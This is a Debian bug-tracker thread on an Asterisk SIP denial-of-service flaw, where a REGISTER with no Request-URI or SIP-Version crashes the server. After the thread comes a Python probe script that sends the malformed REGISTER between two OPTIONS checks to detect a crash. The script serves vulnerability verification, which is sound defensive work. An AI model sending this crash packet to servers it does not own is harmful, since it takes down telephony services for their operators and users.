Bug#435521: closed by Mark Purcell <msp at debian.org> (Re: Bug#435521: Asterisk SIP DOS Vulnerability)
msp at debian.org
Mon Aug 6 20:21:01 UTC 2007
Per the advisory, I believe this issue is resolved in asterisk 1.4.x.
Debian unstable currently has version 1.4.9, so the bug should be resolved.
We have a backported version of 1.4.9 available from http://buildserver.net/
On Mon, 6 Aug 2007, you wrote:
> I have installed asterisk version 1:1.2.13~dfsg-2 (
> http://packages.debian.org/stable/comm/asterisk) and the problem seems to
> remain; asterisk crashes when it receives a REGISTER packet with no Request-URI
> and no SIP-Version.
> Massimiliano Toce
> 2007/8/3, Debian Bug Tracking System <owner at bugs.debian.org>:
> > This is an automatic notification regarding your Bug report
> > #435521: Asterisk SIP DOS Vulnerability,
> > which was filed against the asterisk package.
> > It has been closed by Mark Purcell <msp at debian.org>.
> > Their explanation is attached below. If this explanation is
> > unsatisfactory and you have not received a better one in a separate
> > message then please contact Mark Purcell <msp at debian.org> by replying
> > to this email.
> > Debian bug tracking system administrator
> > (administrator, Debian Bugs database)
> > ---------- Forwarded message ----------
> > From: Mark Purcell <msp at debian.org>
> > To: Massimiliano Toce <massimiliano.toce at gmail.com>, 435521-done at bugs.debian.org
> > Date: Fri, 3 Aug 2007 17:48:16 +0100
> > Subject: Re: Bug#435521: Asterisk SIP DOS Vulnerability
> > Version: 1:1.4.2~dfsg-1
> > The advisory stated this issue is resolved in version 1.4.1 and later.
> > It would be useful if you could confirm using S.T.R.E.S.S that the
> > version in debian unstable does indeed have this issue resolved.
> > Mark
> > On Wed, 1 Aug 2007, Massimiliano Toce wrote:
> > > Package: asterisk
> > > Version: 1:1.2.13~dfsg-2
> > > Severity: critical
> > > Tags: security
> > >
> > > Asterisk crashes when handles a REGISTER message with no URI and no
> > > SIP-Version. See http://labs.musecurity.com/advisories/MU-200703-01.txt
> > > for more details.
> > >
> > > We found it using S.T.R.E.S.S.: software for security testing
> > > (http://lart.det.unifi.it/Members/rosi/stress).
> > > We are using Debian GNU/Linux 4.0, kernel 2.6.18-4-686.
> > >
> > > regards,
> > > Massimiliano Toce, Leonardo Maccari, Matteo Rosi
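Mark asks the reporters to confirm against the version in unstable. The script below is an added example for this thread, not code from S.T.R.E.S.S., Asterisk or the Mu Security advisory: it sends a well-formed OPTIONS as a baseline, then a REGISTER whose request line is only `REGISTER` (no Request-URI, no SIP-Version, the shape the report describes), then a second OPTIONS. A target that answered before the malformed packet and is silent afterwards has most likely crashed. The target host and port, the advertised source address (192.0.2.1, from the documentation range) and the `probe@` identities are assumptions; point it only at a server you own.

```python
"""Liveness probe for a SIP server that may crash on a REGISTER with no
Request-URI and no SIP-Version.  Added example for this bug thread; not
S.T.R.E.S.S., Asterisk or advisory code.  Host, port, SRC and the probe@
identities are assumptions."""
import socket
import sys
from typing import Optional, Tuple

SRC = "192.0.2.1"  # assumed address advertised in Via/Contact


def _message(request_line: str, target: str, call_id: str, cseq: str) -> bytes:
    """Assemble a minimal SIP request around the given request line."""
    lines = [
        request_line,
        f"Via: SIP/2.0/UDP {SRC}:5060;branch=z9hG4bK-{call_id}",
        "Max-Forwards: 70",
        f"From: <sip:probe@{target}>;tag={call_id}",
        f"To: <sip:probe@{target}>",
        f"Call-ID: {call_id}@{SRC}",
        f"CSeq: {cseq}",
        f"Contact: <sip:probe@{SRC}:5060>",
        "Content-Length: 0",
    ]
    return ("\r\n".join(lines) + "\r\n\r\n").encode()


def build_register(target: str, malformed: bool = False, call_id: str = "probe-reg-1") -> bytes:
    """REGISTER request; malformed=True leaves only the method on the request line."""
    request_line = "REGISTER" if malformed else f"REGISTER sip:{target} SIP/2.0"
    return _message(request_line, target, call_id, "1 REGISTER")


def build_options(target: str, call_id: str = "probe-opt-1") -> bytes:
    """Well-formed OPTIONS request used as the liveness check."""
    return _message(f"OPTIONS sip:{target} SIP/2.0", target, call_id, "1 OPTIONS")


def status_code(datagram: Optional[bytes]) -> Optional[int]:
    """Status code from a SIP response status line, or None for no/invalid reply."""
    if not datagram:
        return None
    first = datagram.split(b"\r\n", 1)[0].split(b" ")
    if len(first) < 2 or not first[0].startswith(b"SIP/2.0") or not first[1].isdigit():
        return None
    return int(first[1])


def verdict(before: Optional[int], after: Optional[int]) -> str:
    """Compare OPTIONS replies before and after the malformed REGISTER."""
    if before is None:
        return "inconclusive: target did not answer OPTIONS before the test"
    if after is None:
        return "likely vulnerable: OPTIONS answered before, silent after malformed REGISTER"
    return "survived: target still answers OPTIONS after malformed REGISTER"


def exchange(sock: socket.socket, addr: Tuple[str, int], msg: bytes) -> Optional[bytes]:
    """Send one datagram and return the first reply, or None on timeout."""
    sock.sendto(msg, addr)
    try:
        return sock.recv(4096)
    except socket.timeout:
        return None


def probe(host: str, port: int = 5060, timeout: float = 2.0) -> str:
    """Run baseline OPTIONS, malformed REGISTER, OPTIONS again; return the verdict."""
    addr = (host, port)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        before = status_code(exchange(sock, addr, build_options(host, "probe-opt-1")))
        exchange(sock, addr, build_register(host, malformed=True))
        after = status_code(exchange(sock, addr, build_options(host, "probe-opt-2")))
    return verdict(before, after)


if __name__ == "__main__":
    # Usage: python sip_probe.py <host> [port]
    target_host = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    target_port = int(sys.argv[2]) if len(sys.argv) > 2 else 5060
    print(probe(target_host, target_port))
```

Any SIP reply at all (a 404 or 401 is as good as a 200) counts as "alive"; the baseline OPTIONS is there so that a server that simply ignores unknown peers is reported as inconclusive rather than as vulnerable.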